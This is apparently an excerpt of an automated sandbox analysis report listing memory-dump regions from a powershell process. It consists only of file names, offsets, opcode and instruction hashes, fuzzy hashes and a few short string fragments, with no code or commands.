                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8d018dc546830ffa29ea2ac00f77116582ad099cbcf8e550379d0eeaaea87b0f
                                                                                                                                                                                                                                • Instruction ID: a59ff23e346094ccda65fe7b379f6d7b3b139b1ad8b2713ac00960b2b23e3e4e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d018dc546830ffa29ea2ac00f77116582ad099cbcf8e550379d0eeaaea87b0f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6F082709043045BD7609FB8D49C7D6BBF4FB45314F00446AE65DCB640DB39A881C791
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 13efbb43c9e96fbd9f223debed3aae67cd28b67df5d10b6cb85403da4ae0a5f6
                                                                                                                                                                                                                                • Instruction ID: 1d0270278a5c146ce0f787dc3be5ce285e24e917d20afbbff3cd448d2ce26312
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13efbb43c9e96fbd9f223debed3aae67cd28b67df5d10b6cb85403da4ae0a5f6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1E02672B04209ABDB2485A9EC98ADEFFBCDBCA260F48047EE615E3741D661285583D0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d65f9b15de1f5b6ec34d4884705acb59c4df3f23ecb1d5a5a6114052c4d17f53
                                                                                                                                                                                                                                • Instruction ID: 68dbd076d38c6ad513800841e93c83a69f90e67fed700684881792a31449b71d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d65f9b15de1f5b6ec34d4884705acb59c4df3f23ecb1d5a5a6114052c4d17f53
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FE065363001008FC320DF1DD488D6ABBFAEFCE62131900AAE949CB330CA21EC01CB80
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: c4d07e97c190753918f53d8bd19552f66760b00a9bb6ca00f83cf7877c8b5534
                                                                                                                                                                                                                                • Instruction ID: 185be7d2d841c5469ec59624decc972840f9a08ccc3535d7f2df1fafd7970144
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4d07e97c190753918f53d8bd19552f66760b00a9bb6ca00f83cf7877c8b5534
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80E0D89674525017C550E1A958053FAA5FE8EC247570802739725CB6C1DD04CC0243B3
                                                                                                                                                                                                                                Memory Dump Source
• Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 51a9ff3e196e16bab3c81620c4d58039ecf68b0efd0d3bf1722201df1b00149a
• Instruction ID: b8f8e273aa205fae3c88dbe973bc9fba4c8ee8d34f7c05875a69640ee851d4d8
• Opcode Fuzzy Hash: 51a9ff3e196e16bab3c81620c4d58039ecf68b0efd0d3bf1722201df1b00149a
• Instruction Fuzzy Hash: B9F09279A01114DFCB04CF98EA89D9EB7B6FF48315B258154EA09AB351CB31ED51CF80
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e33cae2251912624a1a2bc11d647cb1157259644d4756698b5ed27c9f6c1eafb
                                                                                                                                                                                                                                • Instruction ID: 5d1e3b739829155b930e0e492bd7cd14445c809c9e6c0b13b0bb4165879b7be4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e33cae2251912624a1a2bc11d647cb1157259644d4756698b5ed27c9f6c1eafb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DE08631A091478FC744EFA4E4864EEBFB1B745309B008569DA05D7700E6355D41CB81
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                                • Instruction ID: 7d06bc1bba94cc3ba73d49ac46b8c84277c5214b1dc6ee67767c257476a1f65a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71D06270D042099F8780EFADC94166DFBF4EB48200F5085AAC919E7301E7315612DBD1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 13cfdf99739c68529f48a4229d6c4cf01a0d3252ce3584e5e3f6535c7f708036
                                                                                                                                                                                                                                • Instruction ID: 2a88e1b6440a5ac602346e89962a6e6a6c7fd05ed806927177f75256575ac497
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13cfdf99739c68529f48a4229d6c4cf01a0d3252ce3584e5e3f6535c7f708036
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6D06735C041099BCB09EBA4E85B4FDBB74FA14309F4041A9DA0753290EA355A5ACEC5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: b62ed69039c27b2bf9e6abf9b8821e9ee82a12b7a95f57a6e2ae03f7eaaec66e
                                                                                                                                                                                                                                • Instruction ID: 1a5e2219204e1b9ede10ed61e2733f7e4f153149625cac435d9cf5678c191f48
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b62ed69039c27b2bf9e6abf9b8821e9ee82a12b7a95f57a6e2ae03f7eaaec66e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BD01730A0820A9FCB18EFA4E8468AEBBB9BB44304F004169DE0A93740EA305D01CBC2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: fd3b29b15879c52143858e050371fafc1b34a13589977c24543018d17797e6d0
                                                                                                                                                                                                                                • Instruction ID: 21f11c193313cb71286bb78cf4e01ec5916d43311d14422130dcd29c2fce9619
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd3b29b15879c52143858e050371fafc1b34a13589977c24543018d17797e6d0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25D09239B44218CFCB04CBA4E895ADDB771FF84315F208065E5159B351CB32A912CB40
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 0292f4fc6bed3ce168fb1cd3b2b3597a063fe420c5e13f0ebd634a9b6db54b36
                                                                                                                                                                                                                                • Instruction ID: ce5566596fa262cd1a494b9b0b4c8112f5cbcf01cc8ec7e4baec828ff0f96f1a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0292f4fc6bed3ce168fb1cd3b2b3597a063fe420c5e13f0ebd634a9b6db54b36
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BC08C104083804EEF0687306C2E4047F74EE87301B0626C3C90A8B1B3DD288800D321
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7a736786f6e756335220a9528fc7cac27dcb1a3688b2de4f02e9a4528ec298c1
                                                                                                                                                                                                                                • Instruction ID: c0d6abc0a35430f9f6afdd6516d036ba648c82afe807fa006d141ca9e4680065
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a736786f6e756335220a9528fc7cac27dcb1a3688b2de4f02e9a4528ec298c1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65C012390452899FCB199B78E088888BB30AF91219711099EE80A4A2A3CA73C44ACB20
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2594482920.00000000037B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 037B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_37b0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8cd65c672606b667d69d1f95b9611608d23d95377b0ac09b9ec844bb1458e477
                                                                                                                                                                                                                                • Instruction ID: e3a505a78e9552d5dfded108e67ea4ff2598aa2d177cbc66a4ecaab15c0124d0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cd65c672606b667d69d1f95b9611608d23d95377b0ac09b9ec844bb1458e477
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82B0923504470D8FC299AF79E4088147329BB8021938008A9EA0E0A2938E36E889CA45
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000020.00000002.2602242650.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7cc0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                                                                                                                                                                                                • API String ID: 0-445857065
                                                                                                                                                                                                                                • Opcode ID: 126e12c041d6809e04d1226d334a1356ef78291995b2b92cc8705a1f2c314df0
                                                                                                                                                                                                                                • Instruction ID: 10f8e80629e60bf75a5a9aac4a1b6ad8790c815d704bb3ac19375642b407d4a5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 126e12c041d6809e04d1226d334a1356ef78291995b2b92cc8705a1f2c314df0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2D136B1B0020A8FC725DB6A944466ABBE6AFC5320F1884BFD515CF256DB31CA86C791